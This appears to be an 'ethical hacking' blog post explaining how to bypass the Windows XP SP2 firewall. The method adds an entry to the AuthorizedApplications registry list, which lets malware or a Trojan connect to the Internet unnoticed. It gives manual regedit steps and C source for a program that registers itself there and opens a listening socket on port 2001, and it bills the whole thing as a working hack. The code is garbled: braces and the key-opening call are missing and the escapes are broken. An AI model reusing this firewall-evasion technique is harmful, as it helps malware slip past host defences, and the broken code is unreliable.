Home / Ethical Hacking / How to Bypass Windows XP Firewall using C program

How to Bypass Windows XP Firewall using C program

How to bypass Windows XP firewall using C
Bypass Windows XP Firewall

Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall’s registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.

Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices SharedAccessParametersFirewallPolicyStandardProfile AuthorizedApplicationsList
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices SharedAccessParametersFirewallPolicyStandardProfile AuthorizedApplicationsList

Add an entry key such as this one:
Name: C:chat.exe
Value: C:chat.exe:*:Enabled:chat

Source Code :-

#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include “Shlwapi.h”
int main( int argc, char *argv [] )
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, “:*:Enabled:”);
strcat(buffer, “bugg”);

“SYSTEM\CurrentControlSet\Services” “\SharedAccess\Parameters\FirewallPolicy\StandardProfile” “\AuthorizedApplications\List”,

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;

fprintf(stdout, “Simple server example with Anti SP2 firewall trick n”);
fprintf(stdout, ” This is not trojan n”);
fprintf(stdout, ” Opened port is :2001 n”);
fprintf(stdout, “author:Mark Kica student of Technical University Kosicen”);
fprintf(stdout, “Dedicated to Katka H. from Levoca n”);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
temp = send(new_fd, “Hello Worldrn”, strlen(“Hello Worldrn”), 0);
fprintf(stdout, “Sended: Hello Worldrn”);
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = ‘’;
fprintf(stdout, “Recieved: %srn”, buffer);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, “quit”))

return 0;

/* EoF */

Remove ** from the header files… easier to understand…Here we are just manipulating registry values using this program…
I hope you all liked It… If you have any queries ask me in form of comment…

About Lokesh Singh

Hello Friends, i am Lokesh Singh, certified Ethical hacker ( CEH, SSA, CSIF , CISSP). Have 8+ years of extensive experience in Ethical Hacking, Cyber Security and Penetration Testing domain.

Have any Suggestions? Compliments? Why not comment then?